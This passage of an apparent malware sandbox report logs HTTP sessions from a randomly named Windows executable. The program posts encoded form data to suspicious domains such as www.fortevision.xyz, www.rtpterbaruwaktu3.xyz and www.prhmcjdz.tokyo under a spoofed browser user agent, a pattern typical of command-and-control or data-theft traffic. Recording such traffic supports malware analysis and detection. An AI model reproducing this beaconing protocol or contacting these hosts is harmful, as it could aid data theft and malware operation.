                                                                                      15192.168.2.44988613.248.169.48804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:59.182293892 CET10833OUTPOST /dash/ HTTP/1.1
                                                                                      Host: www.fortevision.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.fortevision.xyz
                                                                                      Referer: http://www.fortevision.xyz/dash/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 63 54 76 51 2f 6c 67 4a 44 35 75 58 7a 6f 42 53 68 78 78 33 75 42 69 31 2b 6e 4a 33 70 31 31 79 45 30 50 6f 41 67 4f 31 6d 5a 4f 37 4f 39 68 51 4a 54 78 44 39 49 2f 76 38 62 77 2b 35 51 45 78 46 63 2f 75 49 44 69 6d 34 71 5a 62 65 65 53 58 50 75 44 73 38 68 4b 7a 66 58 54 5a 70 72 6f 73 76 51 4f 54 57 34 4c 33 39 36 46 30 64 73 33 42 76 42 78 58 37 4e 7a 6f 46 42 31 55 49 2f 78 5a 4d 36 63 39 2f 6b 55 30 77 50 52 61 46 48 77 4e 61 66 52 54 44 73 50 65 46 6f 53 6d 4d 50 37 39 55 33 50 57 64 78 34 55 44 72 58 4f 73 4b 39 49 50 42 63 54 74 50 79 42 4e 6a 73 53 46 61 65 59 4a 7a 2b 70 42 4d 6b 2b 48 74 63 46 35 39 76 6a 48 75 4f 63 31 75 65 79 49 50 41 49 4a 67 4c 43 31 6a 5a 4e 4a 56 4c 32 2f 53 54 53 6b 31 4c 41 6b 6a 35 4f 50 65 2b 4e 2b 51 77 43 4c 49 58 33 30 63 46 4a 51 42 68 43 34 31 6a 4b 59 4e 7a 69 2b 7a 41 6d 6e 74 7a 76 56 77 47 44 59 51 51 73 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZScTvQ/lgJD5uXzoBShxx3uBi1+nJ3p11yE0PoAgO1mZO7O9hQJTxD9I/v8bw+5QExFc/uIDim4qZbeeSXPuDs8hKzfXTZprosvQOTW4L396F0ds3BvBxX7NzoFB1UI/xZM6c9/kU0wPRaFHwNafRTDsPeFoSmMP79U3PWdx4UDrXOsK9IPBcTtPyBNjsSFaeYJz+pBMk+HtcF59vjHuOc1ueyIPAIJgLC1jZNJVL2/STSk1LAkj5OPe+N+QwCLIX30cFJQBhC41jKYNzi+zAmntzvVwGDYQQswLkLCq8Jk0Y3KNxXhrmrXALT+mTgWmKjUkFc8hZm+SZPSadrYzsMjkwWqeev6IRInOubR9Q++H3iPlbdEYHNQj+ThlMFsJy6zGoUyiwYuCLzsl9U98z+NNVqo11W3oWUmEQJ1xVaiZhUSMzxjybt/JgQewNw40NiJ/kBTlw1Frd+8yAB5PrRSRbd5IaG6m2zOdg6mExHQCGVX4Adinw3emKGAZmjD44zs83ZetfZIKseOsG9a7ehSZXk6quUQhFU6ZikRHO6WDpbaqbSxyGWK0Ohe0c1RgxnezR163oq3gj53j4WxqvCiJAJVR/SJggLIk/qd2cAaOswhacl/dW5Mqr/dnQ6gn5WDaim5jSB6/g69YgwfsuzN9pxv29dZM4Hm9wUHTAn2145BgMgviimy3yK2t6qGiCi5huFFaWkRvKM0Zhb8rlDqGEzRAuAXjgukOAMfKyX9raTudjloWY4jzp4vH4olMG7MQ50Apx3MHxvaykd271MRo9smsI0AaYp07LmtDu6kuJp75hJDLa3AaJ5c1LuAG9udxCL6uMkjkPx11j4kDxW9hjKx45D1xFw6x7KzC1gXojkiQDavlOV0GGfW1Pbtjh8Z6Q8RAiHapiRBzp87arm5QdMmspCRS5tsUGRpZIr5YmoYe1bm/Vghydl0FpdjAeSJJ [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.44989313.248.169.48804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:01.849385023 CET463OUTGET /dash/?etx=BXy4elO0X&3vNdCBvX=YMHBudoHIUxH+uWIVKjvQ5iF9tPwkJokcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q0LUsa6Gef/JbuNbn4M13wkoCvJOzh8OnTqA= HTTP/1.1
                                                                                      Host: www.fortevision.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:11:03.029344082 CET398INHTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Sun, 24 Nov 2024 07:11:02 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 258
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 74 78 3d 42 58 79 34 65 6c 4f 30 58 26 33 76 4e 64 43 42 76 58 3d 59 4d 48 42 75 64 6f 48 49 55 78 48 2b 75 57 49 56 4b 6a 76 51 35 69 46 39 74 50 77 6b 4a 6f 6b 63 6a 41 49 34 6b 75 6a 54 38 79 71 5a 4d 68 38 50 77 64 43 59 68 55 63 58 46 38 48 6d 37 4e 75 77 4a 72 6b 6d 38 31 4b 30 6b 41 58 68 47 77 55 74 78 31 51 30 4c 55 73 61 36 47 65 66 2f 4a 62 75 4e 62 6e 34 4d 31 33 77 6b 6f 43 76 4a 4f 7a 68 38 4f 6e 54 71 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?etx=BXy4elO0X&3vNdCBvX=YMHBudoHIUxH+uWIVKjvQ5iF9tPwkJokcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q0LUsa6Gef/JbuNbn4M13wkoCvJOzh8OnTqA="}</script></head></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.449909103.21.221.87804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:09.352554083 CET746OUTPOST /mv7p/ HTTP/1.1
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 54 53 53 63 6a 42 30 75 5a 45 6c 38 57 4d 76 4e 42 67 53 6e 38 4a 36 39 6e 45 59 32 46 58 34 68 77 71 44 44 6d 4e 74 6d 56 48 71 34 2b 38 46 59 54 4e 53 31 36 47 2b 45 44 30 72 56 76 74 6e 79 67 77 7a 6b 2b 43 51 4c 34 63 72 4b 5a 6b 70 4c 61 57 78 47 6b 4f 4c 34 53 34 46 70 5a 6b 49 59 65 53 67 2f 38 70 76 2f 58 58 62 32 4f 6f 69 54 5a 45 6c 49 38 52 38 4c 46 4b 66 66 4b 6a 5a 64 6d 4d 4f 49 41 62 49 7a 68 77 34 2f 48 62 4b 6b 2b 63 52 69 53 6c 75 53 61 51 74 6f 58 66 35 32 65 50 4a 45 2b 67 33 75 63 33 59 79 5a 50 79 64 42 30 76 2f 77 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=0VM7/Aofdi5OaTSScjB0uZEl8WMvNBgSn8J69nEY2FX4hwqDDmNtmVHq4+8FYTNS16G+ED0rVvtnygwzk+CQL4crKZkpLaWxGkOL4S4FpZkIYeSg/8pv/XXb2OoiTZElI8R8LFKffKjZdmMOIAbIzhw4/HbKk+cRiSluSaQtoXf52ePJE+g3uc3YyZPydB0v/w==
                                                                                      Nov 24, 2024 08:11:10.900155067 CET1033INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Sun, 24 Nov 2024 07:11:10 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.449917103.21.221.87804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:12.029685020 CET766OUTPOST /mv7p/ HTTP/1.1
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 77 2f 34 68 56 57 44 53 53 52 74 6e 56 48 71 67 4f 39 75 58 7a 4d 2f 31 36 4b 49 45 42 67 72 56 76 35 6e 79 68 41 7a 6b 4a 32 52 4a 6f 63 74 42 35 6b 72 54 36 57 78 47 6b 4f 4c 34 53 38 2f 70 66 4d 49 5a 75 69 67 2f 65 42 73 6a 6e 58 45 69 65 6f 69 5a 35 46 75 49 38 52 65 4c 45 57 35 66 49 72 5a 64 6a 6f 4f 49 53 6a 4c 36 68 77 2b 77 6e 61 7a 30 73 39 5a 72 33 46 36 64 4d 45 31 31 58 4c 6e 7a 59 43 54 56 50 42 67 38 63 54 72 76 65 47 47 51 43 4a 6d 6b 2f 77 32 2f 59 74 68 54 78 56 63 6b 66 69 4f 46 6e 4c 4e 73 57 41 3d
                                                                                      Data Ascii: 3vNdCBvX=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI2w/4hVWDSSRtnVHqgO9uXzM/16KIEBgrVv5nyhAzkJ2RJoctB5krT6WxGkOL4S8/pfMIZuig/eBsjnXEieoiZ5FuI8ReLEW5fIrZdjoOISjL6hw+wnaz0s9Zr3F6dME11XLnzYCTVPBg8cTrveGGQCJmk/w2/YthTxVckfiOFnLNsWA=
                                                                                      Nov 24, 2024 08:11:13.628062010 CET1033INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Sun, 24 Nov 2024 07:11:13 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.449924103.21.221.87804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:14.697859049 CET10848OUTPOST /mv7p/ HTTP/1.1
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 32 6e 34 68 6e 4f 44 41 44 52 74 6b 56 48 71 2b 2b 39 74 58 7a 4e 39 31 36 43 55 45 42 39 63 56 74 42 6e 7a 48 55 7a 31 73 61 52 54 34 63 74 4f 5a 6b 6d 4c 61 58 72 47 6b 65 50 34 52 55 2f 70 66 4d 49 5a 6f 75 67 6f 63 70 73 77 33 58 62 32 4f 6f 75 54 5a 45 4a 49 39 34 38 4c 48 36 50 63 34 4c 5a 63 44 34 4f 4f 68 62 4c 31 68 77 38 33 6e 61 43 30 73 78 57 72 7a 73 55 64 4d 59 50 31 56 58 6e 2f 2f 7a 65 4a 4d 77 36 71 2f 62 44 30 4f 47 51 64 55 4a 55 6a 39 51 75 31 6f 39 68 49 52 46 70 6e 75 66 53 58 55 4c 52 32 6d 79 2f 31 34 56 42 55 79 6b 77 58 6c 49 62 57 4f 54 79 30 6b 33 71 31 2b 5a 69 65 47 43 54 43 5a 70 72 4c 4e 72 38 4f 4b 49 58 34 57 75 53 58 50 6b 75 6d 65 31 74 59 61 4a 51 4d 44 62 6f 35 79 6d 43 6d 33 74 35 52 47 6b 30 5a 37 50 6d 32 65 56 50 38 35 6e 42 39 35 43 67 71 42 65 71 2b 5a 63 4f 48 7a 68 31 79 4e 78 56 4c 4a 68 7a 57 6a 69 70 74 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI22n4hnODADRtkVHq++9tXzN916CUEB9cVtBnzHUz1saRT4ctOZkmLaXrGkeP4RU/pfMIZougocpsw3Xb2OouTZEJI948LH6Pc4LZcD4OOhbL1hw83naC0sxWrzsUdMYP1VXn//zeJMw6q/bD0OGQdUJUj9Qu1o9hIRFpnufSXULR2my/14VBUykwXlIbWOTy0k3q1+ZieGCTCZprLNr8OKIX4WuSXPkume1tYaJQMDbo5ymCm3t5RGk0Z7Pm2eVP85nB95CgqBeq+ZcOHzh1yNxVLJhzWjiptVHw3iyq/leLdnFV/Ns+7DTr5x5OILn9jdacelBpaYEza3o/4mcaSMrRnvSc0wBYOZPV84CTr7pU6gnWhh7npLltTl9vUB73i0fGJRAPJjQaTxdIl4ccMaLRa8F97caOgozESowclbjDH1EynIxCbT7su13Cqym2gYczsXevcpCmdoy7tScDtso1SLnayo3WdJFUzIbPOCsgPzdeIqHq/aCAFE0fkpOGTGmGVGVv9g95Hj3SKuvGPD+LbrIEpboBZPDEVLyWFwWJsdPeFnwwvsXrNrPF+Re+xXewQxyYvDkQOcgxVzaI+k3EkOWYkXaC0WfhhZyBzHTkOiBxSvfU+q3093kwn/WjnYcxRjbJRRSYdKoMC2TxLphDQ+tM6st9l8OmB/KwCkMmrV6Ovg5yFsjcASW5/fuT4dxjdAi4MIHyiaNnAoQQGgliIau5IQDSUGE+ivFkpcPzQ40vA1X9hCBkVDMGUdhNtbTlsKXp0lasy22FAtvPi8qhfcuXAuk54eW4o24M1OgUuhnPi70643O2ODFvh7zRSmwYaSWcfcpdCxiN//TqpT+Gye5SoxslsZUbZlc559jYajkj+Fb4qXxpJPMcFrEMmqk5wjgcJ0HIhlr1od/WXh9J5nQBKo8dpurUq94CLuFROS0lymD1cfPxshS73TRDsRj [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.449931103.21.221.87804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:17.361005068 CET468OUTGET /mv7p/?3vNdCBvX=5Xkb80UCbQYKeySKU05ZgY0hyXkWVD4R8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOGKEDCrVhSay3c3WH5ydFiaohW8mA4vlt7iA=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:11:18.959041119 CET1033INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Sun, 24 Nov 2024 07:11:18 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.4499528.210.46.21804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:26.421331882 CET728OUTPOST /cm9a/ HTTP/1.1
                                                                                      Host: www.prhmcjdz.tokyo
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.prhmcjdz.tokyo
                                                                                      Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 4e 74 6c 59 31 31 75 38 77 77 38 79 76 31 5a 6b 39 41 79 4f 45 5a 46 4d 4a 4e 4b 66 61 4a 68 36 33 36 44 49 6f 72 4e 69 2f 59 6f 35 54 4e 53 39 68 64 74 73 47 50 76 4d 6a 78 7a 41 2f 55 33 51 67 78 33 67 59 49 4e 73 56 4a 56 70 54 42 57 37 64 5a 32 32 6b 52 54 63 75 50 79 6e 63 6d 6a 55 65 57 65 2b 4e 2b 6f 70 49 44 64 61 41 32 6e 69 30 2f 6c 62 7a 63 6e 6e 76 53 72 39 41 57 79 6c 4a 6f 70 4b 64 62 43 45 57 4f 41 71 68 6b 5a 55 74 48 66 4b 7a 58 64 62 63 62 2f 34 52 4d 42 36 6f 32 77 46 5a 7a 4d 52 38 53 68 38 31 79 49 44 6b 39 42 4f 65 69 33 4d 36 4b 2b 69 4c 47 69 44 30 51 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=NtlY11u8ww8yv1Zk9AyOEZFMJNKfaJh636DIorNi/Yo5TNS9hdtsGPvMjxzA/U3Qgx3gYINsVJVpTBW7dZ22kRTcuPyncmjUeWe+N+opIDdaA2ni0/lbzcnnvSr9AWylJopKdbCEWOAqhkZUtHfKzXdbcb/4RMB6o2wFZzMR8Sh81yIDk9BOei3M6K+iLGiD0Q==
                                                                                      Nov 24, 2024 08:11:27.981043100 CET508INHTTP/1.1 200
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:11:27 GMT
                                                                                      Content-Type: application/json;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Origin
                                                                                      Vary: Access-Control-Request-Method
                                                                                      Vary: Access-Control-Request-Headers
                                                                                      Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 54{"msg":"/cm9a/","code":401}0


